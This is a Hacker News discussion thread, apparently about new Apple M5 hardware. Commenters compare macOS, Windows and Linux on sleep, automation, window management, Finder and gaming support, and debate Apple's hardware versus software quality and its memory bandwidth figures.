From a hardware perspective, I still don’t understand why Windows and laptop manufacturers can’t get sleep working right. My Intel MacBook Pro with an old battery still sleeps and wakes and lasts for several hours, while my new Windows laptop lasts about an hour and won’t wake from hibernate half the time without a hard reboot.

I think Windows is the “good enough” for most people.

BeetleB•4h ago
> I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

While overall I may say MacOS is better, I would not say it's better in every way.

Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

robenkleene•1h ago
> I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

Did you try Keyboard Maestro https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey and I'd be super curious if there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece, it's hard to imagine it being any better.)

Also I think this statement needs a stronger defense given macOS includes Shortcuts, Automator, and AppleScript, I don't know much about Windows automation but I've never heard of them having something like AppleScript (that can say, migrate data between applications without using GUI scripting [e.g., iterate through open browser tabs and create todos from each of them operating directly on the application data rather than scripting the UI]).

prewett•3h ago
> Windows only saving grace, as a developer, is WSL.

So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

dboreham•2h ago
Also the control key works.
simonh•1h ago
Just enable space bar heating.
jpalawaga•3h ago
Mac also can't get sleep right. Have you tried to make a macbook consistently be 'awake' when the lid is closed?

You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level, the flexibility to run something in clamshell mode is broken, even when using caffeine/amphetamine/etc etc etc.

So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff, just acknowledge that there WAS a tradeoff made.

cyberpunk•2h ago
Counter-Example: I ran an air without a monitor connected for years using caffeine, worked perfectly for me..
strbean•3h ago
> And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

Oh god, I'm going to have to bite the bullet and switch to 11, huh?

The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

oritron•5h ago
> the basics are still rock solid

A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

simonask•5h ago
It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

It’s not even close.

oritron•4h ago
I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

robenkleene•1h ago
> I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

I don't find your original anecdote convincing:

> A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after? E.g., file-system operations? GUI search? How much do they know about how Mail app stores message (e.g., I used to try understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are you syncing mail messages, e.g., using native IMAP, or whatever Gmail uses, or Exchange? What's the email backend?

E.g. without deeper evidence this sounds more like a mail message indexing issue rather than a mail-messages-stored-on-disk-issue (in 2025, I'd personally have zero expectations about how Mail manages messages on disk, e.g., I'd expect local storage of message to be dynamically managed like most applications that aren't document-based use a combination of cloud functionality and local caching, e.g., found this in a quick search https://apple.stackexchange.com/questions/471801/ensure-maco...), but if you have stronger evidence I'd love to hear it. But as presented your extrapolating much stronger conclusions than are warranted by the anecdote in my opinion.

afandian•4h ago
I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of of wifi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.
philsnow•2h ago
> But I’ve certainly never struggled with getting WiFi to work on a Mac

I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

> or struggled with getting it to sleep/wake

My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).

sofixa•4h ago
> sleep works 100% of the time for days on end

In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

> the basics are still rock solid

The basics like the OS flat out refusing to provide you any debugging information on anything going wrong? It's rock solid allright. I had an issue where occasionally I would get an error "a USB device is using too much power, try unplugging it and replugging it." Which device? Why the hell would Apple tell you that, where is the fun in that?

Key remapping requires installing a keylogger, nor can you have a different scroll direction between mouse and touchpad. There still isn't window management which for the sizes of modern monitors is quite constraining.

> still has UNIX underneath

A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and turns out that Apple has decided that libraries can only be loaded from a number of authorised locations which can only be accessed while installing an application. You can't just use a dynamic library you're linking to, it has to be part of a wider install.

carlosjobim•3h ago
> Key remapping requires installing a keylogger

You can remap with config files: https://hidutil-generator.netlify.app

eitally•4h ago
I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was, and it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook as was pretty content.

Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

qwertytyyuu•5h ago
these days i'd rather have macbook running windows than macos running on standard windows laptop of the same form factor, purely for the efficiency of apple silicon.
floam•1h ago
It wouldn’t be so power efficient anymore.
lenkite•5h ago
Windows would have beat MacOS only if Microsoft had just done one small, teeny-weeny thing - just left the OS alone after Win 10.
xedrac•4h ago
I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.
leptons•2h ago
It depends on what you mean by "beat". Windows has a vastly larger market share than Apple ever has, or ever will.
dysoco•52m ago
Oh but they absolutely did beat MacOS. The amount of people who give a damn about UI polish, response times, etc. is insignificant to them.

They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

lotsofpulp•4h ago
Seeing my wife have to deal with BSOD and tedious restarts for Windows updates and myriad just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

Not once in 10 years have I had ti troubleshoot while she uses her personal macOS, but a Dell Latitude laptop in 2025 still can’t just “open lid, work, close lid”.

And it’s slower. And eats more battery.

klooney•3h ago
Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.
foobarian•33m ago
To me it's not a MacOS vs Windows thing. It's a hardware build quality thing for sure; but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but the problem is this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result Apple's product will inevitably be better than those without such an organizational backbone.

Quoth the Tao of Programming:

8.4

Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

Software and Hardware, ashamed, returned to their homes.

larodi•3h ago
Curiously every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms price/value ratio for current ML pipelines. But Apple do not have server line, which then seems to be super massive problem for their products, even though their products actually compete with NVidia in the consumer market, which is very substantial position, software or not.

AMD was also lagging with drivers, but now we see OpenAI swearing they gonna buy loads of their products, which so many people were not favor of liek just 5-7 years ago.

tantalor•5h ago
Been like that since 1977
mcv•5h ago
I want this hardware available for other systems.
makeitdouble•5h ago
That won't happen for now:

https://arstechnica.com/gadgets/2023/08/report-apple-is-savi...

Apple's chip engineering is top tier, but money also buys them a lot of advance.

ksec•5h ago
Modern ARM C1 Ultra Core is only 10% slower than M5, likely even less when you factor in system level cache and memory. So the gap isn't as wide as most people think it is.
hamdingers•2h ago
What laptops is that chip featured in?
samwillis•5h ago
Software is very easy to bloat, expand scope, and grow to do more than really needed, or just to release apps that are then forgotten about.

Hardware is naturally limited in scope due to manufacturing costs, and doesn't "grow" in the same way. You replace features and components rather than constantly add to them.

Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pair it down to something manageable and sustainable.

pxc•5h ago
> pare down products and features

macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

coredog64•5h ago
I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

(I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

panick21_•5h ago
If you think hardware can't bloat, I suggest you look into the history of Intels attempt to replace x86. Or the VAX. Not to mention tons of minicomputer companies who built ever more complex minis. And not to mention the supercomputer startup bubble.
6SixTy•2h ago
macOS has like no features already, and they keep removing more.
foofoo12•5h ago
It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

elicash•5h ago
For Vision Pro, software team has been impressive. And arguably outperformed the hardware team.

But this is the exception.

thomascgalvin•5h ago
> The modern Apple feels like their hardware teams way outperforming the software teams.

There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

butlike•5h ago
There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient curve of improvements, over the earth-shattering announcements of yore (such as the advent of popular cellular phones).

scbzzzzz•5h ago
True. I would like to hijack this thread and wante d to discuss what we want for software that is not present. For me. All i can think of is ondevice , al/ml ( photo editing, video editing etc ) and not the ones the current companies are trying hard shove down our throats.

May be steve is true. We don't know what we want until some one shows it .

throw_this_one•5h ago
Their software is literally falling apart. ios26 was the biggest trash ive ever experienced from a company this big
vuggamie•5h ago
I'm old enough to remember Windows CE phones crashing during phone calls.
pivo•5h ago
How so? Seriously asking because it works fine for me.
throw_this_one•4h ago
Buggy. Random slowness in the UI going well below 120hz. Massive battery drain for no reason. UI elements just looking out of place, big print, random places.

The UI itself is supposed to be intense to render to some degree. That's crazy because most of the time it looks like an Android skin from 2012.

And on top of this all -- absolutely nobody asked for this. No one asked for some silly new UI that is transparent or whateveer.

lijok•2h ago
Sounds like an experience problem
eloisant•5h ago
Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.
steve1977•4h ago
Google has always been a advertising company
CharlesW•3h ago
> Apple have always been a hardware company…

Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

kace91•5h ago
There are talks of the hardware head replacing Cook.

Hopefully that will bring whatever they’re doing right to other teams.

butlike•5h ago
I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.
thewebguyd•4h ago
Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.
markus_zhang•5h ago
I pretty much see the Macbook as some fancy toys with mediocre software. Maybe the kernel is solid but other software are very meh, even comparing to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is system programming so naturally a Linux box is more suitable.

Biggest grief with MacOS software:

- Finder is very mediocre comparing to even File explorer in Windows

- Scrollbar and other UI issues

Unfortunately I don't think Asahi is going to catch up, and Macbook is so expensive, so I'll probably keep buying second hand Dell/Lenovo laptop and dump a Linux on top of it.

lou1306•5h ago
What makes Mac great is/was the ecosystem of 3rd party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "louder" which... may become a problem.

I still agree that second hand Thinkpads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

markus_zhang•5h ago
I have to admit, every time I looked into screenshots of earlier Macs, like the 68K and PPC ones, I felt I loved the UI and such. I even bought a PPC laptop (I think it's a maxed out iBook with 1.5GB of RAM) to tinker with PPC assembly.

But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI is better.

prewett•1h ago
Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The featureset, though, was limited. Managing extensions was clunky, and until MacOS 10, applications had a fixed amount of RAM they could use, which could be set by the user, but which was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system error bomb icon was classic, the sad-Mac boot-failure icon was at least consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

Sohcahtoa82•4h ago
> - Finder is very mediocre comparing to even File explorer in Windows

It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (ie, /bin, /etc) without having to memorize some esoteric key combination?

For fuck's sake, even my home directory is hidden by default.

> - Scrollbar and other UI issues

Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

For years, you couldn't even disable mouse acceleration without either an esoteric command line or using 3rd party software. Even now, you can't disable scroll wheel acceleration. I hate that I can't just make a consistent "one click = ~2 lines of text" behavior.

I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

kemayo•3h ago
> Why the hell is there no key to delete a file?

Command + backspace.

cmiller1•3h ago
> Why the hell is there no key to delete a file?

Cmd+delete? I don't really want it to be a single key as it's too easy to accidentally trigger (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name)

dd_xplore•1h ago
You know IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps), it comes mainly from the software.

MacOS doesn't have enough 'openness' to it. There's no debug information, lack of tools etc. To this day I can still daily drive a XP or 98/2000 machine( if they supported the modern web) because all the essentials are still intact. You can look around system files, you customize them edit them. I could modify game files to change their behaviour. I could modify windows registry in tons of ways to customize my experience, experiment lot of things.

As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

All the random hardware that we see launching from time to time have drivers for windows but not for Mac. Even linux has tons of terminal tools and customisation.

MacOS is like a glorified phone OS. It's weirdly locked down at certain places that drive you crazy. Tons of things do not have context menus(windows is filled with it).

Window management sucks, there's no device manager! Not even cli tools! (Or maybe I'm not aware?) Why can't I simpy cut and paste?

There's no API/way to control system elements via scripting, windows and linux are filled to the brim with these! Even though the UI is good looking I just cannot switch to an Apple device (both Mac and iPhone) for these reasons. I bought an iPad pro and I'm regretting. There's no termux equivalent in iPadOS/iOS , there are some terminal tools but they can't use the full processing power, they can't multi thread. They can't run in background, it's just ridiculous. The iPad Pro is just a glorious iPhone. Hardware doesn't make a device 'Pro' software does. Video editing isn't a 'Pro' workflow in the sense that it can be done in any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today, does that make the air a 'Pro' device? No!

astrange•1h ago
> As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

https://limi.net/checkboxes

> Window management sucks

I'm always mystified reading these kinds of posts on HN because it literally always turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

> there's no device manager! Not even cli tools!

`ioreg -l` or `system_profiler`. Why does this matter?

> There's no API/way to control system elements via scripting

https://developer.apple.com/library/archive/documentation/Ac...

https://developer.apple.com/documentation/XCUIAutomation

https://en.wikipedia.org/wiki/AppleScript

https://support.apple.com/guide/shortcuts/welcome/ios

BeFlatXIII•47m ago
> Why the hell is there no key to delete a file?

Command+Backspace.

nabla9•4h ago
Doing good job is rewarded.

Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

utf_8x•4h ago
Interesting, I thought the next in line was Craig Federighi
wslh•4h ago
I've been thinking whether it could be a reasonable move for Apple to launch a cheaper secondary brand, one that offers devices capable of running Linux or Windows to reach a broader market without cannibalizing its own.
dawnerd•4h ago
Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.
JKCalhoun•4h ago
There has to be a whole different mindset with hardware though. Every change has to necessarily be more considered, cross-checked. And I don't say this in any way to disparage software engineers (hold up hand) but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)
SCdF•4h ago
I don't think it's the modern Apple, I think that's just Apple.

I remember using iTunes when fixing the name of an album was a modal blocking function that had to write to each and every MP3, one by one, in the slowest write I have ever experienced in updating file metadata. Give me a magnetised needle and a steady hand and I could have done it faster.

A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

robenkleene•2h ago
Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

bigyabai•15m ago
Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

SCdF•11m ago
Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

I also think you're confusing what I wrote. It's not a competition.

I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

[1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, they jury is clearly out

7e•4h ago
Apple relies heavily on H1-B slave labor. They don’t pay their software teams enough to be competitive and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound foolish.
whitehexagon•4h ago
I dunno, didnt they already crack the 400GB/s memory bandwidth some years ago? This seems like just another small bump to handle latest OS effects sludge.

Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clock-work MBA driven trickle of slightly better over-hyped future eWaste.

To outperform during this crisis, hardware engineers worth their salt need to designing long lived boxes with internals that can be easily repaired or upgraded. "yeah but the RAM connections are fiddly" Great, now that sounds like a challenge worth solving.

But you are right about the software. Installing Asahi makes me feel like I own my compter again.

astroflection•4h ago
https://asahilinux.org/

"Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

Why the "®" after Linux? I think this is the first time I've seen this.

utf_8x•4h ago
The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...
tyrellj•4h ago
This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (boot loaders, linux kernel support, etc). Particle released a really cool dev board recently, but the software is lacking. Qualcomm struggled with their new CPU launch with poor support as well. It sometimes takes a while for new Intel processor features to be supported in the toolchains, kernel, and then get used in software.

Aside from that, I think of Apple as a hardware company that must write software to sell their devices, maybe this isn't true anymore but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task either.

amelius•3h ago
Yes. And their consumer teams are way outperforming their business teams.
oofbey•3h ago
In a sense, hardware's job is easier, because the goals are more clear. Make it faster, and more power efficient. Vast amounts of complexity within those goals. But try to summarize the north-star vision for a complex software project like an OS in terms anywhere close as simply as this.
mproud•3h ago
The hardware team has always shined, but how about one example of this:

The PowerBook from the mid 1990’s were hugely successful, especially the first ones, which were notable for what we now take for granted: pushing the keyboard back allowing space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. All the while the ’90s roared on, Apple was languishing, looking for a modern OS.

crazygringo•2h ago
Apple is a hardware company. This has always been the case. It's not just the modern Apple.
gloosx•1h ago
From my vast experience with MacOS, Apple is notoriously bad at the most basic software, like notes or calculator
textlapse•1h ago
It does feel like Apple is firing on all cylinders for their core competencies.

Software (iOS26), services (Music/Tv/Cloud/Apple Intelligence) and marketing (just keep screaming Apple Intelligence for 3 months and then scream Liquid Glass) ---- on the other hand seem like they are losing steam or very reactive.

No wonder John Ternus is the widely anticipated to replace Tim Cook (and not Craig).

throwaway48476•6h ago
No M5 mac mini?
randomtoast•6h ago
A unified memory bandwidth of 1,224 gigabits per second is quite impressive.
vardump•6h ago
Probably gigabytes (GB) and not gigabits (Gb)?

Edit: gigabits indeed. Confusing, my old M2 Max has 400 GB/s (3200 gigabits per second) bandwidth. I guess it's some sort of baseline figure for the lowest end configuration?

Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.

mihau•6h ago
why? M3 Ultra already had 800 GB/s (6400 gbps) memory bandwidth
NetMageSCW•6h ago
But what did the base M3 have? Why compare to different categories?

Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

sapiogram•6h ago
And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.
Aurornis•6h ago
High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

RossBencina•5h ago
Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).
Rohansi•3h ago
And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.
modeless•5h ago
Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.
hannesfur•5h ago
> All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

That’s true for the on-GPU memory but I think there is some subtlety here. MoE models have slimmed the difference considerably in my opinion, because not all experts might fit into the GPU memory, but with a fast enough bus you can stream them into place when necessary.

But the key difference is the type of memory. While NVIDIA (Gaming) GPUs ship with HBM memory ship for a while now, the DGX Spark and the M4 use LPDDR5X which is the main source for their memory bottleneck. And unified memory chips with HBM memory are definitely possible (GH200, GB200), they are just less power efficient on low/idle load.

NVIDIA Grace sidestep: They actually use both HBM3e (GPU) and LPDDR5X (CPU) for that reason (load characteristics).

The moat of the memory makers is just so underrated…

Havoc•5h ago
I was looking at that number and thinking opposite - that's oddly slow at least in context of new apple chip.

Guessing that's their base tier and it'll increase on the higher spec/more mem models.

Retr0id•5h ago
Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.
tiahura•6h ago
No 16”?
adamch•6h ago
They'll announce that along with M5 Pro and Max in March or so.
littlecranky67•6h ago
And here I am, selling my Macbook M4 Pro to buy a Macbook Air and a dedicated gaming machine. I've tried gaming on the Macbook with Heroic, GPTK, Whiskey, RPCS3 emu and some native. When a game runs, the performance is stunning for a Laptop - but there is always glitches, bugs and annoyances that take out the joy. Needles to mention lack of support from any sort of online multiplayer, due to the lack of anticheat support.

I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

SigmundA•6h ago
Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect windows gaming with PC elsewhere in house.

This has been by far the best setup until Apple can take gaming seriously, which may never happen.

bamboozled•6h ago
Sometimes I just feel like buying the latest and greatest game, I have an m4 too, the choices are usually quite abysmal. I agree.
qnpnp•3h ago
My solution is cloud gaming in that case, such as GeforceNow (for compatible games), or Shadow (for a whole PC to do as you please).
gjsman-1000•6h ago
Many people blame the lack of OpenGL/Vulkan... but I really don't buy it. It doesn't pass the sniff test as an objection. PlayStation doesn't support OpenGL/Vulkan (they have their own proprietary APIs, GNM, GNMX, PSSL). Nintendo supports Vulkan but performance is so bad, almost everyone uses the proprietary API (NVN / NVN2). Xbox obviously doesn't accept OpenGL/Vulkan either, requiring DirectX. Understanding of Metal is widespread in mobile gaming, so it's weird AAA couldn't pull from that industry if they wished.
coldpie•5h ago
The primary reason is Apple's environment is too unstable for gaming's most common business model. Most games are developed, released, and then sold for years and years with little or no maintenance. Additionally, gamers expect the games they purchased to continue to work indefinitely. Apple regularly breaks backwards compatibility in a wide variety of ways (code signing requirements; breaking OS API changes; hardware architecture changes). That means software run on Apple OSes must be constantly maintained or else it will eventually stop working. Most games aren't developed like that.

No one who was forced to write a statement like [this](https://help.steampowered.com/en/faqs/view/5E0D-522A-4E62-B6...) is going to be enthusiastic about continuing to work with Apple.

gjsman-1000•5h ago
I've heard this argument, but it also doesn't pass the sniff test in 2025.

1. When is the next transition on bits? Is Apple going to suddenly move to 128-bit? No.

2. When is the next transition on architecture? Is Apple going to suddenly move back to x86? No.

3. When is the next API transition? Is Apple suddenly going to add Vulkan or reinvigorate OpenGL? No. They've been clear it's Metal since 2014, 11 years ago. That's plenty of time for the industry to follow if they cared, and mobile gaming has adopted it without issue.

We might as well complain that the PlayStation 4 was completely incompatible with the PlayStation 3.

coldpie•5h ago
I mean, I worked in this space, and I'm telling you why many of the people I worked with weren't interested in supporting Apple. I'm happy to hear your theories if you don't like mine, though.
gjsman-1000•5h ago
I think the past bit people, but unlike the PS4 transition or gaming consoles in the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it... leaving "don't support Apple" as a bit of a institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?
coldpie•5h ago
Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

> What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

bigyabai•3h ago
> even though the odds of another transition seem almost nonexistent.

You see, the existence of that "almost" is already less confidence than developers have on every game console as well as Linux and Windows.

fruitworks•5h ago
What happens when apple switches to riscv, or depreciates versions of metal in a backwards incompatible way, or mandates some new code signing technique?

The attitude in the apple developer ecosystem is that apple tells you to jump, and you ask how high.

You could complain that Playstation 4 software is incompatible with Playstation 3. This is the PC gaming industry, there are higher standards for the compatibility of software that only a couple companies can ignore.

gjsman-1000•5h ago
